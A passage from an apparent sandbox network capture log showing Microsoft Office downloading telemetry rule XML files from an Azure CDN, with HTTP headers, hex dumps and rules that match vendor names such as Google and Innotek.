                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                x-ms-request-id: 2250be27-501e-007b-7961-3b5ba2000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155420Z-178bfbc474bfw4gbhC1NYCunf400000004q0000000009e34
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:20 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                60192.168.2.44989013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:19 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:20 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 475
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                x-ms-request-id: 1c81f4ad-001e-005a-6fbf-3bc3d0000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155420Z-174c587ffdfmlsmvhC1TEBvyks000000039000000000bs8x
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:20 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                61192.168.2.44989213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:20 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:20 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 491
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                x-ms-request-id: af6ae163-c01e-0082-6735-3caf72000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155420Z-178bfbc474bq2pr7hC1NYCkfgg00000004wg000000004tvs
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:20 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                62192.168.2.44989413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:21 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 479
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                x-ms-request-id: b70f59bb-c01e-0079-1f91-3de51a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155422Z-15b8b599d88hd9g7hC1TEBp75c000000030g00000000hp2s
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:22 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                63192.168.2.44989513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:22 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                x-ms-request-id: 4ec76ea5-a01e-006f-014e-3c13cd000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155422Z-178bfbc474bwlrhlhC1NYCy3kg00000004hg00000000nwb5
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                64192.168.2.44989613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:22 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155422Z-174c587ffdf9xbcchC1TEBxkz400000002z000000000dd25
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                65192.168.2.44989713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:22 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                x-ms-request-id: 2b57feed-101e-0028-5221-3c8f64000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155422Z-178bfbc474btvfdfhC1NYCa2en00000004q000000000egsr
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                66192.168.2.44989813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:22 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                x-ms-request-id: ce4e00c6-401e-00a3-3516-3d8b09000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155422Z-178bfbc474bnwsh4hC1NYC2ubs00000004p000000000gyd8
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:22 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                67192.168.2.44989913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:24 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                x-ms-request-id: 90758f84-b01e-0021-4c46-3ccab7000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155424Z-178bfbc474b9xljthC1NYCtw9400000004q0000000000xqk
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                68192.168.2.44990013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:24 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                x-ms-request-id: 907655e5-001e-0065-594b-3c0b73000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155424Z-15b8b599d8885prmhC1TEBsnkw000000035g00000000grp9
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:24 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                69192.168.2.44990113.107.246.63443
